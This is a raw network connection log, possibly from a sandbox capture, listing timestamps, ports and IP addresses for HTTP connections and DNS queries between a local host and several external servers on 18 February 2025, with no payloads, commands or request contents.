                                                                        Feb 18, 2025 08:14:25.071588993 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.071594000 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.071613073 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.071715117 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.071732998 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.071738958 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.071748972 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.071755886 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.071763039 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.071780920 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.071803093 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.072218895 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072230101 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072237015 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072280884 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.072369099 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072423935 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.072586060 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072592020 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072602987 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072608948 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072665930 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.072665930 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.072731018 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072737932 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072748899 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072774887 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.072910070 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072916031 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072926044 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072932959 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072940111 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072952986 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.072957993 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.072985888 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.073051929 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.073110104 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.073441982 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.084247112 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.084286928 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.084297895 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.084362030 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.084362984 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.084369898 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.084429026 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.084435940 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.084455013 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.084461927 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.084484100 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.084639072 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.084645987 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312509060 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312654972 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312705040 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.312835932 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.312844992 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312851906 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312863111 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312870026 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.312900066 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.313090086 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.313209057 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313215017 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313226938 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313231945 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313237906 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313249111 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313266039 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.313314915 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313414097 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.313419104 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313425064 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313435078 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.313446045 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.313472986 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.323811054 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323823929 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323831081 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323921919 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323928118 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323945045 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323951006 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323967934 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323972940 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:25.323972940 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.323995113 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.323995113 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:25.324023962 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:29.604012012 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:29.604093075 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:34.725379944 CET5238053192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:14:34.730242968 CET53523801.1.1.1192.168.2.4
                                                                        Feb 18, 2025 08:14:34.730381966 CET5238053192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:14:34.735367060 CET53523801.1.1.1192.168.2.4
                                                                        Feb 18, 2025 08:14:35.184357882 CET5238053192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:14:35.189584017 CET53523801.1.1.1192.168.2.4
                                                                        Feb 18, 2025 08:14:35.189790010 CET5238053192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:14:36.512132883 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:15:07.496448040 CET5238180192.168.2.4104.21.16.1
                                                                        Feb 18, 2025 08:15:07.501332045 CET8052381104.21.16.1192.168.2.4
                                                                        Feb 18, 2025 08:15:07.501416922 CET5238180192.168.2.4104.21.16.1
                                                                        Feb 18, 2025 08:15:07.511040926 CET5238180192.168.2.4104.21.16.1
                                                                        Feb 18, 2025 08:15:07.516091108 CET8052381104.21.16.1192.168.2.4
                                                                        Feb 18, 2025 08:15:08.250482082 CET8052381104.21.16.1192.168.2.4
                                                                        Feb 18, 2025 08:15:08.250940084 CET8052381104.21.16.1192.168.2.4
                                                                        Feb 18, 2025 08:15:08.251076937 CET5238180192.168.2.4104.21.16.1
                                                                        Feb 18, 2025 08:15:08.251116037 CET8052381104.21.16.1192.168.2.4
                                                                        Feb 18, 2025 08:15:08.251157999 CET5238180192.168.2.4104.21.16.1
                                                                        Feb 18, 2025 08:15:08.255815029 CET5238180192.168.2.4104.21.16.1
                                                                        Feb 18, 2025 08:15:08.260546923 CET8052381104.21.16.1192.168.2.4
                                                                        Feb 18, 2025 08:15:23.428047895 CET5247980192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:23.432861090 CET8052479199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:23.432951927 CET5247980192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:23.448081017 CET5247980192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:23.453697920 CET8052479199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:23.924133062 CET8052479199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:23.924149036 CET8052479199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:23.924161911 CET8052479199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:23.924194098 CET5247980192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:23.924223900 CET5247980192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:24.964051962 CET5247980192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:25.983927011 CET5249580192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:25.988748074 CET8052495199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:25.988816023 CET5249580192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:26.004981041 CET5249580192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:26.010256052 CET8052495199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:26.471092939 CET8052495199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:26.471110106 CET8052495199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:26.471123934 CET8052495199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:26.471184015 CET5249580192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:27.511017084 CET5249580192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:28.529747963 CET5251180192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:28.534689903 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.534799099 CET5251180192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:28.554032087 CET5251180192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:28.718342066 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.718360901 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.718485117 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.719099045 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.720082045 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.720815897 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.720832109 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.721334934 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:28.721349955 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:29.004501104 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:29.004616976 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:29.004662991 CET5251180192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:29.005136013 CET8052511199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:29.005187988 CET5251180192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:30.057811022 CET5251180192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:31.076471090 CET5253280192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:31.081706047 CET8052532199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:31.081795931 CET5253280192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:31.090898037 CET5253280192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:31.095813990 CET8052532199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:31.565486908 CET8052532199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:31.565531969 CET8052532199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:31.565573931 CET8052532199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:31.565834999 CET5253280192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:31.568862915 CET5253280192.168.2.4199.59.243.160
                                                                        Feb 18, 2025 08:15:31.573828936 CET8052532199.59.243.160192.168.2.4
                                                                        Feb 18, 2025 08:15:36.590080023 CET5256880192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:36.595031977 CET805256813.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:36.595129967 CET5256880192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:36.608201027 CET5256880192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:36.613030910 CET805256813.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:37.053355932 CET805256813.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:37.053574085 CET805256813.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:37.053621054 CET5256880192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:38.227756023 CET5256880192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:39.233014107 CET5258480192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:39.237973928 CET805258413.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:39.238065958 CET5258480192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:39.254173994 CET5258480192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:39.259088039 CET805258413.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:39.727627039 CET805258413.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:39.727667093 CET805258413.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:39.727710962 CET5258480192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:40.760998011 CET5258480192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:41.779953957 CET5260080192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:41.784935951 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.785037041 CET5260080192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:41.802930117 CET5260080192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:41.807881117 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.807900906 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.807930946 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.807945013 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.807959080 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.808150053 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.808162928 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.808176041 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:41.808188915 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:42.251498938 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:42.257509947 CET805260013.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:42.257628918 CET5260080192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:43.308043003 CET5260080192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:44.326462030 CET5261980192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:44.331820965 CET805261913.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:44.331954956 CET5261980192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:44.341515064 CET5261980192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:44.346330881 CET805261913.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:44.792871952 CET805261913.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:44.793090105 CET805261913.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:44.793153048 CET5261980192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:44.796171904 CET5261980192.168.2.413.248.169.48
                                                                        Feb 18, 2025 08:15:44.800924063 CET805261913.248.169.48192.168.2.4
                                                                        Feb 18, 2025 08:15:49.827076912 CET5265680192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:49.831978083 CET8052656162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:49.832098007 CET5265680192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:49.852987051 CET5265680192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:49.857994080 CET8052656162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:50.452797890 CET8052656162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:50.452816010 CET8052656162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:50.453083038 CET5265680192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:51.354976892 CET5265680192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:52.373496056 CET5265780192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:52.378400087 CET8052657162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:52.378528118 CET5265780192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:52.394565105 CET5265780192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:52.399413109 CET8052657162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:52.974826097 CET8052657162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:52.974893093 CET8052657162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:52.974967003 CET5265780192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:53.901657104 CET5265780192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:54.920394897 CET5265880192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:54.925170898 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.925291061 CET5265880192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:54.941356897 CET5265880192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:54.946252108 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946362972 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946373940 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946382999 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946392059 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946408987 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946666956 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946676016 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:54.946685076 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:55.550357103 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:55.550431013 CET8052658162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:55.550607920 CET5265880192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:56.448596001 CET5265880192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:57.467339039 CET5265980192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:57.472237110 CET8052659162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:57.472358942 CET5265980192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:57.481786966 CET5265980192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:57.486620903 CET8052659162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:58.060925961 CET8052659162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:58.061045885 CET8052659162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:15:58.061120033 CET5265980192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:58.064137936 CET5265980192.168.2.4162.0.231.203
                                                                        Feb 18, 2025 08:15:58.068877935 CET8052659162.0.231.203192.168.2.4
                                                                        Feb 18, 2025 08:16:03.194369078 CET5266080192.168.2.413.248.169.48
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 18, 2025 08:16:03.199354887 CET | 80 | 52660 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:03.199457884 CET | 52660 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:03.216617107 CET | 52660 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:03.221759081 CET | 80 | 52660 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:03.676928043 CET | 80 | 52660 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:03.676947117 CET | 80 | 52660 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:03.677239895 CET | 52660 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:04.729825020 CET | 52660 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:05.749018908 CET | 52661 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:05.753861904 CET | 80 | 52661 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:05.753936052 CET | 52661 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:05.771408081 CET | 52661 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:05.776173115 CET | 80 | 52661 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:06.212783098 CET | 80 | 52661 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:06.212812901 CET | 80 | 52661 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:06.212902069 CET | 52661 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:07.276787043 CET | 52661 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:08.297632933 CET | 52662 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:08.302421093 CET | 80 | 52662 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:08.303050041 CET | 52662 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:08.324414968 CET | 52662 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:08.329216957 CET | 80 | 52662 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:08.329288960 CET | 80 | 52662 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:08.329298973 CET | 80 | 52662 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:08.329314947 CET | 80 | 52662 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:08.329324007 CET | 80 | 52662 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:08.329365015 CET | 80 | 52662 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:08.329375029 CET | 80 | 52662 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:08.329472065 CET | 80 | 52662 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:08.329480886 CET | 80 | 52662 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:08.769023895 CET | 80 | 52662 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:08.775100946 CET | 80 | 52662 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:08.776489019 CET | 52662 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:09.823858976 CET | 52662 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:10.853173971 CET | 52663 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:10.860416889 CET | 80 | 52663 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:10.862785101 CET | 52663 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:10.872796059 CET | 52663 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:10.877558947 CET | 80 | 52663 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:14.361450911 CET | 80 | 52663 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:14.361464977 CET | 80 | 52663 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:14.361639023 CET | 52663 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:14.364614010 CET | 52663 | 80 | 192.168.2.4 | 13.248.169.48
Feb 18, 2025 08:16:14.372797966 CET | 80 | 52663 | 13.248.169.48 | 192.168.2.4
Feb 18, 2025 08:16:19.397725105 CET | 52664 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:19.402599096 CET | 80 | 52664 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:19.402827024 CET | 52664 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:19.431338072 CET | 52664 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:19.436305046 CET | 80 | 52664 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:20.933176041 CET | 52664 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:20.938302994 CET | 80 | 52664 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:20.938646078 CET | 52664 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:22.530366898 CET | 52665 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:22.536744118 CET | 80 | 52665 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:22.536909103 CET | 52665 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:22.552894115 CET | 52665 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:22.557832003 CET | 80 | 52665 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:24.058104038 CET | 52665 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:24.063409090 CET | 80 | 52665 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:24.063615084 CET | 52665 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:25.078946114 CET | 52666 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:25.084542990 CET | 80 | 52666 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:25.084702969 CET | 52666 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:25.102543116 CET | 52666 | 80 | 192.168.2.4 | 47.83.1.90
Feb 18, 2025 08:16:25.107480049 CET | 80 | 52666 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:25.107492924 CET | 80 | 52666 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:25.107502937 CET | 80 | 52666 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:25.107512951 CET | 80 | 52666 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:25.107547998 CET | 80 | 52666 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:25.107558012 CET | 80 | 52666 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:25.107568026 CET | 80 | 52666 | 47.83.1.90 | 192.168.2.4
Feb 18, 2025 08:16:25.107578993 CET | 80 | 52666 | 47.83.1.90 | 192.168.2.4
